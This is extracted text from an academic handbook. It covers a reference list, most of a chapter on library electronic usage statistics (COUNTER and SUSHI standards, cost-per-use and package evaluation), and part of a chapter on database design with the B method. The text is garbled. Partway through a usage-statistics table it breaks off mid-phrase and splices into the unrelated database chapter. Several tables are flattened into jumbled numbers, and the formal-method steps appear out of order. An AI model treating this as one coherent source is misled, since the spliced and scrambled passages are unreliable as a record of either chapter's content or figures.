Jin, R., & Ghahramani, Z. (2002). Learning with multiple labels. Proceedings of Neural Information Processing Systems 2002 (NIPS 2002). John, G., & Langley, P. (1995). Estimating continuous distributions in Bayesian classifiers. Proceedings of the 11th Conference on Uncertainty in Artificial Intelligence Lauser, B., & Hotho, A. (2003). Automatic multilabel subject indexing in a multilingual environment. Proceedings of the 7th European Conference in Research and Advanced Technology for Digital Libraries (ECDL 2003). Li, T., & Ogihara, M. (2003). Detecting emotion in music. Proceedings of the International Symposium on Music Information Retrieval. Luo, X., & Zincir-Heywood, A. N. (2005). Evaluation of two systems on multi-class multi-label document classification. Proceedings of the 15th International Symposium on Methodologies for Intelligent Systems. Maron, O., & Lozano-Perez, T. (1997). A framework for multiple-instance learning. Proceedings of Neural Information Processing Systems 1997 (NIPS 1997).
Platt, J. (1998). Fast training of support vector machines using sequential minimal optimization. In B. Scholkopf, C. Burges, & A. Smola (Eds.), Advances in kernel methods—Support vector learning (pp. ). MIT Press. Quinlan, J. R. (1993). C4.5: Programs for machine learning. Morgan Kaufmann. Schapire, R. E., & Singer, Y. (2000). Boostexter: A boosting-based system for text categorization. Machine Learning, 39(2/3), 135-168. Thabtah, F.A., Cowling, P., & Peng, Y. (2004). MMAC: A new multi-class, multi-label associative classification approach. Proceedings of the 4th IEEE International Conference on Data Mining, ICDM ‘04. Witten, I. H., & Frank, E. (1999). Data mining: Practical machine learning tools with Java implementations. Morgan Kaufmann. Wolpert, D. H. (1992). Stacked generalization. Neural Networks, 5 241-259. Zhang, M.-L., & Zhou, Z.-H. (2005). A k-nearest neighbor based algorithm for multi-label classification. Proceedings of the 1st IEEE International Conference on Granular Computing.
McCallum, A. (1999). Multi-label text classification with a mixture model trained by EM. Proceedings of the AAAI’ 99 Workshop on Text Learning.
This work was previously published in the International Journal of Data Warehousing and Mining, edited by D. Taniar, Volume 3, Issue 3, pp. 1-13, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
319
320
Chapter 1.22
Electronic Usage Statistics Patricia Hults Rensselaer Polytechnic Institute, USA
ABSTRACT This chapter provides an overview of electronic usage statistics, including methods of defining, collecting, and using the data. A survey of some of the systems of estimating journal usage in the print environment is followed by a description of the development of electronic usage practices. The important contributions of the COUNTER and SUSHI projects are reviewed, along with issues in the management and use of electronic statistics. Examples of ways these statistics can assist in decision making throughout a product’s life cycle are included, as well as other ways usage statistics can prove useful. The chapter concludes with a brief look at the use of statistics in the bibliomining process.
INTRODUCTION Unless you have a mathematical bent or are one of those individuals who find satisfaction memorizing the major league baseball stats, the topic of
user statistics is not immediately intriguing. In fact, it can be mind numbing and tedious, but user statistics are extremely useful, particularly now that we are able to get real, meaningful information—they cannot be ignored. This chapter will start with an examination of early, pre-electronic usage statistics. It will then look at the development of electronic statistics, including both the COUNTER and SUSHI standards. Management issues in collecting and using these statistics will be explored. Some of the applications of these data will be discussed, in the context of an electronic product’s life cycle. The value of usage statistics beyond just product evaluation will also be covered. Generations of librarians have struggled to find ways to practically measure usage of the material they so carefully select. The information on just how many times a book or journal was used is critical in both selection and retention decisions, and in broader collection development strategies. Without a sense of how many times something is used, it becomes impossible to evaluate its worth.
BACKGROUND Books have always presented less of a problem. You could count the number of times a book was checked out, whether you were counting circulation cards or looking at automatically generated circulation statistics. There was still the bugaboo of in-house use, but there were significant amounts of real circulation data available. Journals presented a much larger challenge. Not only were many libraries organized so that journals were never checked out and sat on open shelves; journals came both bound and in single issues, so that the unit of count was unclear. Indexes, while officially in book format, generally never circulated and therefore their use was as hard to quantify as it was for journals. Because librarians are an ingenious group, all sorts of methods were devised to estimate inhouse use of journals and books and in general to evaluate the worth of a particular title. These efforts ranged from using photocopying requests (Cooper & McGregor, 1994), making correlations between check-outs and in-house use (Walter, 1996), counting journals left on study carrels and near photocopy machines (Bader & Thompson, 1989; Chen, 1972), sticking voluntary usage log sheets on journal protective covers (Konopasek & O’Brien, 1982), and more. Some librarians sent their work-study students skulking in the stacks, trying to measure the ratio of actual vs. recorded use. Other efforts included using external criteria such as journal impact factors and citation analysis (McCain & Bobick, 1981; Rice, 1979). The journal impact factor is a measure of the number of times a journal is cited in published articles. Interestingly, at least one recent study examining electronic usage and impact factor found no correlation between impact factor and local use of the journals. Duy and Vaughan (2006) examined use of electronic journals from three major vendors; the American Chemical Society, Elsevier, and Wiley, and they found there was not
a correlation between impact factor of a particular journal and actual use of that journal on their campus. What they did find more predictive was a local citation figure, calculated by determining how many times a specific journal was cited in articles by campus faculty.
DEVELOPMENT OF ELECTRONIC STATISTICS Librarians continued the tradition of ingenuity when journals, books, and databases began to be available in electronic format, and they quickly began trying to extract more reliable statistics from the new medium. Before publishers began supplying usage information, librarians explored other sources including institutional Website logs, statistics supplied by A-Z list providers, and those generated by link resolvers. While each of these offered interesting insight into patterns of use, they fell far short of accurately and fully capturing the information librarians sought. Unless an institution had loaded the product on its own server, it was clear that publishers would be the primary suppliers of usage statistics. Initially this data varied widely in what was being measured, and many times, what was being measured was fairly meaningless. An example is the number of pages called up from anywhere within the publisher’s site, including help pages, menu pages, and so forth. This type of count served only to create an inaccurate impression of use. In response to pressures from librarians and for their own internal management needs, publishers began attempting to measure journal usage. Some began to supply pages that captured the number of downloaded files from a particular site. This was progress, but it was still very messy. Article and chapters were often divided into multiple files to reduce download time and each component of a single article might be counted as an individual use, greatly inflating overall usage rates. One publisher’s response to statistics requests was to
321
Electronic Usage Statistics
provide the raw data log (Table 1). At least one hapless librarian ended up manually parsing and counting the log files to come up with a reasonable statistic. It was becoming clear that to realize the promise of electronic statistics, some sort of standardization was imperative. Professionals in both the library and the publishing world began to systematically approach the issue. The JSTOR user group was an early participant in laying out the desired elements of e-statistics, beginning the work in 1997 (JSTOR, 1998). In 1998, that work was expanded when the International Coalition of Library Consortia (ICOLC, 1998) released “Guideline for Statistical Measures of Usage of Web-based Indexed, Abstracted, and Full Text Resources.” Such recommendations started laying out just what elements would be needed to give meaningful information. Even with these guidelines, information received from publishers continued to be highly variable. A count of article usage or number of
database searches sounds straightforward, but the way these were calculated could be very different. An article count might vary depending on how the article was segmented, whether links to graphics were a separate count, how printing and downloading the article was counted, how repeated use of an article within a short time was counted, whether articles linked to outside the publisher’s Website were counted and how. Even what constitutes an article could be variable. Business resources tend to supply statistical graphs, company data, and other type of information that falls outside the standard definition of an article. In fact, at the time this chapter was written, business full-text information remains one of the most problematic subject areas for obtaining standardized user statistics. Session and search counts also had their inconsistencies. How were repeated logins by the same user within a short time counted? How were searches that include more than one database counted—as one search or two or more? It gets
even more complicated when federated searching is thrown into the mix. A single federated search may generate 20 or more searches (Pesch, 2004). How do you count these? Another problem was that the way a particular publisher produced its usage data might change, creating significantly different statistics as the method of count was revised. If your publisher changed the way statistics were calculated, the library may have to go back to reharvest data in order to get some consistency, if the older data was available in the new format at all. Another variable was the amount of retrospective data provided by the publisher, impacting how frequently statistics needed to be harvested. The reliability of the publisher providing the data also determined the frequency of pulling those statistics. While publisher statistics were evolving, it behooved an institution to harvest frequently to avoid losing data altogether. The method of providing the statistics also varied widely, some publishers allowing user generated reports, others limited to requests sent to the publisher, some available only through the consortia manager. The format of the reports, even those containing comparable information, could differ widely, requiring significant intervention to be useful. By 2000, less than half of publishers offering electronic journals provided usage statistics (Luther, 2000, p. 1), but the momentum was building. In 2000 and 2001 several significant studies and papers were released addressing the issue of standardized statistics for electronic products. 2000 saw Judy Luther’s “White Paper on Electronic Journals Usage Statistics,” and the initiation of the ARL (Association of Research Libraries) E-Metrics Project. In 2001 ARL released its phase II report (Shim, McClure, Fraser, Bertot, Dagli, & Leahy, 2001) and the IMLS (Institute of Museum and Library Services) published its report, “Developing National Public Library Statistics and Performance Measures for the Networked Environment,” (Bertot, McClure, &
Ryan, 2000). Other initiatives occurring during this time frame included those by the National Commission on Libraries and Information Science and NISO’s revision of the Z39.7 standard. These early efforts were the background in which the COUNTER Project (Counting Online Usage of NeTworked Electronic Resources) emerged out of work being done by PALS (Publishers and Librarian Solutions). The PALS usage statistics working group began laying the framework COUNTER would codify. The group initially developed a code of practice including identification of data elements, definitions of these elements, report format recommendations and recommendations on delivery method (JISC, n.d.). This work evolved into the COUNTER Project, which received its own identity in 2002. Its remarkable success is due in large part to its collaborative nature, involving librarians, publishers, and professional societies. The first release of the code of practice appeared in January 2003. To insure long-term development of the standards, COUNTER was incorporated in the United Kingdom later in 2003. By 2006, due in large part to the COUNTER Project and the earlier work it stands upon, virtually all major, and many smaller publishers provided standardized reports—a phenomenal turn around. The standards have elegance to them. They are not complicated statistics, although producing them can be challenging. They are based on the concept that it is better to have simple, useful statistics that can be provided by all publishers and understood by all users, than complicated reports beyond the scope of many publishers (Shepherd, 2004). This strategy has paid off producing a large number of COUNTER compliant publishers in a remarkably short time, 51 at the time of this writing. Release 1 covered only journal and database reports. It answered the basic questions of how a search and an article download are defined, what a report should contain, in what format it should be available, and how frequently it should
323
Electronic Usage Statistics
be produced. When publishers became compliant with these standards, it started to become possible to compare and evaluate across publisher platforms, although there is still work to be done to insure consistency across platforms (Davis & Price, 2006). Release 2 of the code of practice for journals and databases did not expand on the set of data elements. Rather, it refined the content of reports, and most significantly, spelled out very carefully the steps necessary to prove compliance. For these standards to be widely accepted there needed to be a method to verify that any particular publisher was in fact, counting what COUNTER specifies as standard. The auditing method includes very specific protocol to that end. First a vendor notifies COUNTER that it would like to be authenticated as compliant. The reports are then tested at an approved test library to verify the accuracy of the reports. Only when the test library is satisfied is the vendor certified compliant. Once a vendor has achieved compliant status as verified by a test library, it has 18 months to complete an audit. This audit includes very specific instructions on the types of tests to be performed. These include specifications of the number of searches or downloads to be done, and the time intervals between searches and downloads, which are then matched against the usage report provided by the vendor. After the initial audit, annual audits are required to maintain compliant status. For Release 2, vendors must be initially audited by June 30, 2007, with annual audits required beginning in 2008 (COUNTER, n.d.). Along with release 2 for journals and databases, release 1 for books and reference works appeared in 2006. Like the code of practice for journals and databases, the basic elements of the statistics were defined. Electronic book and encyclopedia statistics are even more challenging, since the basic unit of use is not as discrete or easily defined as a journal article. Along with defining these data elements, the necessary content
324
of a report was also laid out, paralleling journal and database reports. Although COUNTER has gone a long ways to standardize and make useful statistics provided by publishers, there are still some limitations. COUNTER does not addressed the problem of restricting statistics to those generated only by the subscription in question. At least one major publisher regularly includes uses of journals temporarily turned on for promotional use and downloads of titles generated within the institution’s IP range, but not subscribed to by the institution. An institution can end up with usage figures for journals it does not subscribe to, but that are subscribed to by individuals within the IP range, such as researchers or professors. If there are multiple subscriptions to the same journal by both the library and individuals, all the usage figures go into the same report. Filtering out data for journals not subscribed to is tedious and becomes even more problematic as statistical gathering becomes automated. COUNTER has decided that requiring publishers to indicate subscription status would complicate statistical compilation too much. Given the variety of ways institutions have access to journals, such as package deals, current subscriptions and archival subscriptions, and the increasing number of journals that are a combination of open access and fee based, it would be prohibitively complicated to try and sort these access methods out. (P. Shepherd, personal communication, Dec. 14, 2006). Another problem identified by Davis and Price (2006) is the fact that the publisher platform design and functionality can change the usage count. They studied the ratio of HTML to PDF downloads within publisher platforms. The ratio was consistent from journal to journal, but changed from platform to platform. They also examined one journal mounted on two different platforms and confirmed that the platform varied the format ratio. Some platforms force users into the HTML version first, which then links to the PDF. Other
Electronic Usage Statistics
platforms allow users to pick the full-text format from the citation or abstract level, thus reducing the number of HTML downloads and consequently total downloads. Platforms also interface with URL resolvers and indexes differently. Some link directly to the PDF, others link to a higher level of the journal and force more downloads to navigate to the PDF. These varying methods influence the total number of downloads. Davis and Price suggest using a normalization factor when attempting to compare use across platforms. Although usage statistics have improved significantly, you only have to go through the exercise of pulling the same statistics for a year you have already harvested once before to realize that there is still a lot of flux in the reliability and availability of the data. The author recently did just that, in preparation for this chapter, and found a disconcerting lack of consistency. One-half year of the data for one publisher was inexplicably missing. Most probably, the publisher would be able to recreate that data, if requested, but on occasion data is just lost. One or two other publishers had corrected errors in previously supplied statistics, a good thing, but which led to inconsistency with data gathered and used a year before. Other publishers had recently become COUNTER compliant and the format and count of data had changed accordingly. Experiences like these lend support to including other criteria in evaluation of electronic products. Outside the scope of COUNTER is the problem of the sheer volume of statistics coming from multiple sources and in different packages. Library staff have began spending significant time pulling the reports from various sites and trying to merge them into a unified report covering statistics from all the electronic sources of the library. Bordeaux (Bordeaux, Kraemer, & Sullenger, 2005) reported spending 16 hours per month pulling and compiling data; the staff of the author’s institution spends an average 14 hours per month. As library holdings migrate
to electronic format, more and more electronic statistics will be available, requiring more staff time to process the data. At the same time standards for electronic statistics were being developed, a parallel movement was occurring around electronic resource management elements. ERMI (the Digital Library Federation’s Electronic Resource Management Initiative) began defining the elements necessary for an effective electronic resource management system. ERMI evolved into ERMI2 which included requirements for usage data intake and reporting. COUNTER had defined the statistical elements and reporting format; ERMI2 began looking at protocols to move that data into an ERM. While the data itself was now standardized, the way of moving it around was not. In the summer of 2005 a small group met to start addressing this problem. The group included three librarians (Ivy Anderson, California Digital Library; Adam Chandler, Cornell University Library; and Tim Jewell, University of Washington Libraries) and representatives from four companies (Ted Fons, Innovative Interfaces, Inc.; Bill Hoffman, Swets Information Services; Ted Koppel, Ex Libris; and Oliver Pesch, EBSCO Information Systems) (Chandler & Jewell, 2006). Their efforts evolved into SUSHI (Standardized Usage Statistics Harvesting Initiative), soon operating under the wing of NISO. The initial group expanded to include additional publishers and automation system vendors. SUSHI began developing a protocol to allow automated harvesting of statistics from a variety of publishers, based on COUNTER standardization and using an XML envelope. The basic concept of SUSHI is simple. An ERM system should be able to automatically request, receive, and integrate statistics provided by a site, without human intervention. XML was selected as the best, most flexible wrapper for this interchange. The ERM should be able to generate a request, identifying the institution requesting the data, specifying the date range needed, and the
325
Electronic Usage Statistics
address to send the data. The ERM formulates the request, puts all the needed information into an XML file, and sends the file off to the site providing the statistics. The site should be able to receive this information, pull the requested COUNTER compliant data, pop it into an XML file and send it back to the originating ERM. If there is a problem, an error message should be sent. The ERM should then be able unwrap the report and load it into its databank. Finally, the ERM should be able to generate appropriate reports, although this final step is outside the SUSHI protocol, which only deals with the transfer of information to and from the ERM and the publisher. Currently SUSHI 1.0 protocol allows for the retrieval of any COUNTER report, including previous COUNTER releases. The XML schema developed was designed to be easily expanded to include additional COUNTER reports as they are developed. In 2006 NISO and COUNTER came to a formal agreement, in a memorandum of understanding outlining which organization would take care of what. NISO, through SUSHI, will maintain the XML schema. COUNTER will maintain the COUNTER standards and will list SUSHI compliant publishers and vendors on its Website (SUSHI, 2006). NISO currently offers toolkits on its Website for publishers interested in participating in SUSHI. Vendors are just beginning to move toward offering statistical harvesting features in their ERMs. A handful of vendors currently have released this feature, but the wave of the future is automated harvesting, as publishers offer both standardized reports and report transmission formats.
MANAGEMENT OF ELECTRONIC STATISTICS There are some issues that need to be addressed for an institution to effectively manage the collection and analysis of user statistics. First, you
326
must identify which products you want to track. Since electronic use is becoming a major component of most “gate counts,” you want to collect as many as practical, particularly with the growing inclusion of these statistics in national annual surveys. But, do you track each direct journal you subscribe to outside of your packages? Such tracking entails significant staff time. If you are looking at a major cancellation project, can you afford not to have them? Do you only collect statistics that are COUNTER compliant? This leaves you with a great deal of uncounted use. How do you count those products that provide statistics that are not COUNTER compliant, yet are evidence of significant use? Second, staff must be assigned the task of collecting them. This requires training staff on how to get to the statistics and identifying what particular type of statistic to collect. COUNTER compliant sites are generally easier to navigate, but the exact location of the statistics you want to gather can reside several pages into a publisher’s statistical interface, and may move around as publishers revise their Web pages. For nonCOUNTER sites, screen shots of selected data elements may be needed to ensure consistency of just what data is to be recorded. While the amount of time spent gathering statistics decreases as publishers move to providing them in COUNTER format, the overall time increases as more and more publishers provide them. Eventually, when all publishers provide statistics in both COUNTER and SUSHI compliant form, and all institutions have electronic resource management systems that can automatically harvest them, that effort will become much less onerous, but this future will not be quickly seen. Even COUNTER compliant statistics profit from having an alert eye looking at them. One red flag is a sudden, very high peak in usage, which may be the result of automatic downloading software, usually constituting illegal use as spelled out in the product license. Publishers fairly frequently notify subscribers when there
Electronic Usage Statistics
has been a problem with a certain segment of their user statistics and that they may be recalculated. When a publisher becomes COUNTER compliant, they often continue to provide the old format of statistics. Staff needs to monitor statistics and adjust to format changes. If a publisher includes statistics for titles not subscribed to by the institution, you may want those weeded out. Once statistics are gathered, they need to be compiled in a meaningful way. Most institutions use spreadsheets at this point. The challenge is creating a spreadsheet that allows you to meaningfully present quite a range of statistics types, both COUNTER and nonCOUNTER. The author’s institution currently uses a spreadsheet that divides statistics into searches, serial downloads, e-book downloads, other full-text, and other. Each product must be assigned a category and tracked. As the number of electronic products mount, this can be challenging. The annual ACRL statistical survey now asks for number of sessions, searches, and full-text article downloads, as defined by COUNTER. Since not all publishers provide COUNTER compliant statistics, you may want to indicate on your spreadsheet which ones are compliant. Another decision to be made is how long you want to preserve these statistics. Ideally, you want to use them to look at use of both a particular product and overall use over time. How do you insure that the statistics from five years ago will be there when you want to do that analysis? Even with ERMs warehousing statistics, there are likely to be limitations on the number of years of storage.
USE OF ELECTRONIC STATISTICS At this point user statistics are reasonably reliable and meaningful, at least compared to even two years ago. What we do with these statistics, what information they tell us and how we put them to work to improve different functions of the library is the next question. As Mercer (2000) states, “Im-
portant decisions about the nature of our individual libraries are made based on performance factors that often support what we intuitively believe to be true” (¶ 2). The metrics of electronic use may supplant, or will at least supplement, traditional library statistics such as door counts and circulation figures. It is obvious that physical visits to libraries are dropping dramatically as use of electronic materials increases. Proof that users, regardless of their method of access, are using library materials and using them heavily, will be important information for those who decide the fate of library budgets. Subscriptions have a natural life cycle and statistics are helpful in each stage. It is not immediately obvious how statistics can be useful in the selection of a product. Since you do not have the product, you obviously do not have usage statistics. Hahn and Faulkner (2002), of the University of Maryland Libraries, have developed a method of using usage statistics, if the package or journal being considered has similarities to a subscription already held by the institution. First they evaluate an existing collection, developing three metrics: average cost per article, average cost per use, and content-adjusted use. They feel the quantity of articles published in a year, and the use of those articles, are helpful in evaluation. As shown in Table 2, they have a licensed collection with a known price, number of published articles, and number of downloads of those articles. From this they calculate the average cost per article (price divided by total number of articles), average cost per access (price divided by number of downloads), and content-adjusted use (number of accesses divided by number of articles.) Average cost per article can also be calculated for the candidate collection. In this instance, the candidate collection has a higher cost per article—a higher total cost and lower number of articles published. The authors recognize this is not sufficient information for evaluating a collection and have developed three additional benchmarks: cost-
327
Electronic Usage Statistics
Table 2. Comparison of candidate collection to licensed collection
Price Total number of online articles as of the end of the year Total annual number of full-text accesses to the articles in the collection Average cost per article (cost/# articles) Content-adjusted use (accesses/# articles) Average cost per access (price/accesses)
Licensed Collection $10,000 50,000
Candidate Collection $25,000 45,000
25,000
Unknown
$.20 0.50 $.40
$.55 Unknown Unknown
Table 3. Use of benchmarks to compare candidate collection and licensed collection
Price Total number of online articles as of the end of the year Total annual number of fulltext accesses to the articles in the collection Average cost per article (cost/# articles) Content-adjusted use (accesses/# articles)
Average cost per access (price/ accesses)
328
Licensed Collection $10,000 50,000
Candidate Collection $25,000 45,000
25,000
Unknown
$.20
$.55
0.50
Unknown
$.40
Unknown
Benchmark
62,500 uses needed to match average cost per access (costbased usage)
22,500 uses needed to match content-adjusted use (contentbased usage) $1.11 Cost if contentadjusted use met (cost per access at content-based usage level)
Electronic Usage Statistics
based usage, content-based usage, and cost per access at the content-based usage (Table 3). The cost-based usage determines the number of yearly accesses, or downloads, the candidate collection will need in order to meet the same average cost per access as the licensed collection. This is calculated as the price of the candidate collection divided by the cost per access of the licensed collection, in this case $25,000 divided by $.40 = 62,500 accesses. Content-based usage is the number of articles in the candidate collection multiplied by the content-adjusted usage of the licensed collection. This gives the number of full-text accesses needed to match the content-adjusted use (number of accesses divided by number of articles). In this case it is 45,000 multiplied by 0.50 = 22,500 uses. The final benchmark is cost per access at the content-based usage level. This calculates the cost per access if the content-based usage is achieved. This is calculated using the candidate collection price divided by the content-based usage benchmark; $25,000 divided by 22,500 = $1.11. Obviously other factors need to be included into the evaluation of a potential product. But this method allows an estimation of the quantity of use required for a product to match a similar product in cost effectiveness. Another use for statistics when evaluating a potential purchase occurs when archives are being considered, particularly when used with other information such as that provided by Tenopir and King (2000, p.188). They analyzed the pattern of use of a journal broken down by article age. Scientists made up the demographic group they were studying and it is likely that discipline of the user would affect these patterns. However, a later examination of three studies on journal usage (King, Tenopir, Montgomery, & Aerni, 2003), which included nonscientific faculty, provided results that roughly approximated their original finding (Table 4). About 58.5% of the use of a journal involves articles that have been published within the last year.
If a library already subscribes to a journal, their data could be used to project usage of archives, particularly for a scientific or technical field. For example, let us look at Journal A. A subscription to Journal A includes the current 2 years, costs $2000.00, and generated 250 downloads within the last year. This represents a cost per article of $8.00 ($2000 divided by 250). These downloads represent about 70.8% of the total expected use of the publication (58.5% the first year and 12.3% the second year). If all years were available the projected use would be 353 downloads (250 divided by .708). The archives are priced at an annual fee of an additional $150.00. Use can be predicted to be 29.2% of the projected total use, for an estimated archival use of 103 articles per year. The cost per article is then calculated at $150.00 divided by 103, for a cost of $1.46 per article. In another example, Publisher A offers an archival package that includes four journals, with coverage up to 1998. The institution’s current subscription to those journals generated 1326 downloads in one year, covering a publication period of 8 years, and representing 90.3% of expected use, using Tenopir and King’s chart, with a little extrapolation for the 6-10 year span. If all years were available, you can predict a total use of 1468 (1326 divided by .903). The cost of the current subscriptions is $8,752 (combined cost of
Table 4. Age and use of articles Age of article 1 2 3 4-5 6-10 11-15 >15
Percent of use 58.5 12.3 6.2 7.7 9.3 1.5 4.6
329
Electronic Usage Statistics
the four journals) divided by 1326 uses results in a cost of $6.60 per article download. The archival package has an initial cost of $8,000 with an annual maintenance fee of $350. The projected annual use is 142 articles (1468 downloads times 9.7%). Using the average cost of $6.60 from the current subscription, it would take about 9 years before the initial cost is recovered (142 times $6.60 for an annual cost of $937.20, $8000 divided by the annual cost). But a comparison of document delivery costs should also be made. Assuming $30.00 per document requested, a ball-park document delivery charge, 142 documents requested a year would generate a total annual cost of $4,260. This makes that initial cost of $8000.00 begin to look much more cost effective. Obviously, usage statistics can play a prominent role in the evaluation of an existing library’s subscription. The literature frequently warns of relying too heavily on statistics, but truthfully, reliable statistics are taking some of the guess-work out of evaluation. Clearly, they are not the only criteria, factors such as the size of the program a journal supports, a journal’s importance to its field, publishing patterns by the institution’s faculty, membership on editorial boards by faculty, and so on, all need to be considered, but for the first time, we have some real data to frame decisions. An emerging evaluation standard is the cost per article download. It is a relative figure and only has meaning in comparison to other cost per article calculations from the institution or in comparison to document delivery costs. Within that context, it is a very helpful metric. Kraemer reports creating an annual evaluation overview which includes a complete list of usage and cost per usage, a list of both high and low cost per use products, and a list of high demand titles generated from interlibrary loan requests (Bordeaux, Karmer, & Sullenger, 2005). Such analyses set a useful framework in which to place renewal decisions. Cost per use is also helpful when evaluating a package subscription. A question that is often
330
raised is whether it is better use of your money to subscribe to a package deal or to pick off the high use titles and subscribe to them individually. A straightforward examination of this question can be made. The cost per use of the package is easily calculated. In the example represented in Table 5, the package deal comes with a requirement to maintain existing subscriptions to titles carried by the publisher. The total cost of the package is thus the package cost and the associated subscription costs. This figure, divided by the total usage, gives you the cost per use of the package. Looking at your individual title usage, arranged from high use to low, you could then calculate the point at which the total of individual title subscriptions would equal your package total. In this case, the cost of twenty journals with the highest use roughly matches the total package costs. These journals account for only 44.5% of the overall usage. Since use is not highly concentrated with a few journals, it clearly is more cost effective to subscribe to the whole package. With other packages, where use is concentrated in fewer journals, it may turn out that picking off the high use journals is more cost effective. In either case your usage figures allow a methodical decision. Occasionally, because of financial set backs, an institution may be required to conduct a cancellation project. Here too, user statistics can be of great assistance. In the following scenario, shown in Table 6, an institution has a projected electronic expenditure of $406,483. Unfortunately, the available allocation is $203,000. How can those funds be spent to maximize the return? There are several criteria that could be useful, such as total number of journals subscribed to, total number of article downloads, availability of articles through alternative sources such as document delivery, subject coverage of retained journals, and feedback from faculty. Taking a methodical look at usage is helpful. Cost is projected for the next year as increasing 8%. In our example, direct subscriptions represent
Electronic Usage Statistics
Table 5. Analysis of individual journal performance within a publisher’s package
Title Jrnl A Jrnl B Jrnl C Jrnl D Jrnl E Jrnl F Jrnl G Jrnl H Jrnl I Jrnl J Jrnl K Jrnl L Jrnl M Jrnl N Jrnl O Jrnl P Jrnl Q Jrnl R Jrnl S Jrnl T Jrnl U Jrnl V Jrnl W Jrnl X Jrnl Y Jrnl Z
Publisher A: Total # of journals Total article downloads in year Package cost Required subscription cost $24,367 Total cost Cost/use
844 5,848 $8,765 $33,132 $5.67
331
Electronic Usage Statistics
Table 6. Various characteristics of current subscriptions (Electronic Product allocation: $203,000)
Package
Available Ingenta?
Available ECO?
# Jrnls
% total Jrnl titles
Article Downloads 2005
% Total down loads
FY06 Cost
Cost/ Use 2006
Projected cost (8% i – sa < root >,......< soonp > is – a < root >} The simplest situation illustrating the case a2 is composed by a root and two direct descendants of the root. The graph GC is then decomposed as follows: GC1 = {< son2 > is – a < root – son1 >} GC2 = {< son2 > is – a < root ∩ son1 >} GL1 = { is – aL } GL2 = { is – aL } These two conceptual graphs belong to the previous solved elementary case and thus can be transformed into corresponding logical graphs. The Logical graphs GL1 and GL2 are then merged by linking their respective roots through the is – aL relationship. The described procedure is based on the classic Divide and Conquer technique. This technique has been adapted in order to be applied to a graph of conceptual classes as follows: 1. 2.
⇔
GC = < son > is – a < root >
it holds in terms of attribute inheritance. Case a2 can be solved by decomposing the problem into two independent problems of the same type and by merging the respective solutions.
⇔
of object database systems can be explained by observing that in semantic data models each object instance can belong to any class of a specialization hierarchy, thus enhancing flexibility, whereas in object data models each object instance belongs to one and only one class, thus limiting flexibility while enhancing efficiency. Semantic data models have always been translated into relational models; an approach proposed in literature to map semantic data models into object models is the Partitioning Method (Locuratolo & Rabitti, 1998). This section gives a procedure for mapping a directed acyclic graph of classes supported by semantic data models, in the following called conceptual classes, into classes supported by object models, in the following called logical classes. Let us suppose that no direct descendant of the root has further descendants. We discuss an approach to designing the graph of logical classes GL starting from a graph of conceptual classes GC. Let us distinguish the following two cases: a1 and a2.
GL = < son > is – aL < root – son > The two nodes and < root – son > define a partition of the original root, whereas is – aL is the logical specialization, or an oriented link from the node to the node < root – son >. Each object belongs to one and only one logical class. The logical inclusion property is indirect, that is,
3.
Direct solution of the problem when applied to the elementary case. Decomposition of the problem into two independent sub-problems of the same type. The Graph GC is decomposed into two graphs whose root defines a partition of the GC root. The partition is obtained by set difference and set intersection between the GC root and the most left son. Recursive solution of each a2 sub-problem.
453
Database Design Based on B
4.
Composition of the two sub-problem solutions in order to obtain the global solution.
Attributes and transactions are associated with the nodes of the graphs as in Locuratolo and Matthews (1999, a, b, c).
CONCLUSION AND FURTHER DEVELOPMENTS The use of formal methods in the design of database applications can lead to several advantages, including the possibility of guaranteeing the specification consistency and the design correctness. However, formal methods can be too difficult and expensive if compared with existing informal methods. Specifying a database application with the abstract machine notation is a tedious process, since many properties implicitly declared with the database conceptual languages must be explicated. Further, the direct use of B makes the consistency proofs too expensive, since these must be performed not only with respect to the explicit constraints, but also with respect to the class and the specialization constraints. This chapter is devoted to the integration of the ASSO abstraction mechanisms in B. The Abstract Machine state has been restricted with respect to B, since only the state transformations which satisfy the class and the specialization constraints are allowed. If the model for ASSO is directly constructed in B: 1.
2.
3.
454
More detail is added to the Abstract Machines than is necessary in the form of implicit constraints; More proof obligations are generated and proved than is necessary, to show that transactions respect the implicit constraints; and More Abstract Machines are designed than is necessary.
According to the described proposal, only those Class-Machine and Specialized Class-Machines are designed which are necessary to prove the model consistency. By designing only those machines, we have raised the abstraction level of B by imposing the implicit assumptions of ASSO, and we have thus produced a more efficient way of generating designs in the database field, while adding the quality of higher design. Consistency and behavioral refinements of Structured Database Schema specifications can be proved exploiting tools for B (B-Core); the partitioning tool could be designed exploiting the features of the proposed algorithm with the associated properties. The emphasis of this chapter is on database application modeling and correct model transformations. This approach can have various practical implications: •
•
•
To minimize the number of proof obligations and the costs to guarantee the Structured Database Schema consistency. To interpret the specialization hierarchies of the Structured Database Schemas as an approach to eliminate redundancy of not necessarily executable code. To acquire knowledge for specializing general purpose methods employed at industrial level for specific application areas.
ACKNOWLEDGMENT The author would like to thank her husband, Antonio Canonico, and her children, Paola and Floriano, for their help and advice. Figure 3 has been reprinted from “ASSO: Behavioral Specialization Modelling” by Rosanna Andolina and Elvira Locuratolo in Information Modelling and Knowledge Bases VIII, edited by H. Kangassalo, J. Nilson, H. Jaakkola and S. Ohsuga, pages 241-259, copyright 1997, with kind permission from IOS Press.
Database Design Based on B
REFERENCES Abiteboul, S., & Hull, R., & Vianu, V. (1995). Foundations of databases. Addison-Wesley. Abrial, J. R. (1989). A formal approach to large software construction. Lecture Notes in Computer Science, Vol. 375. Abrial, J. R. (1996). The B-book: Assigning programs to meanings. Cambridge University Press. Andolina, R., & Locuratolo, E. (1997). ASSO: Behavioural Specialisation Modelling. In H. Kangassalo (Ed.), Information modelling and knowledge bases VIII (pp. 241-259). IOS Press. Batini, C., Ceri, S., & Navathe, S. B. (1992). Conceptual database design: An entity-relationship approach. Redwood City, CA: Benjamin Cummings. B-Core. B-toolkit (Online Manual). Oxford, UK. Retrieved from http:// www.b-core.com Booch, G. (1994). Object-oriented analysis and design with applications. Redwood City, CA: Beniamin Cummings. Cardenas, A. F., & McLeod. (1990). Research foundations in object-oriented and semantic database systems. Englewood Cliffs, NJ: Prentice Hall. Castelli, D., & Locuratolo, E. (1994). A formal notation for database conceptual schema specifications. In H. Jaakkola, H. Kangassalo, T. Kitahashi, & A. Markus (Eds.), Information modelling and knowledge bases V. IOS Press. Castelli, D., & Locuratolo, E. (1995). ASSO: A formal database design methodology. In H. Kangassalo, H. Jaakkola, S. Ohsuga, & B. Wangler (Eds.), Information modelling and knowledge bases VI. IOS Press.
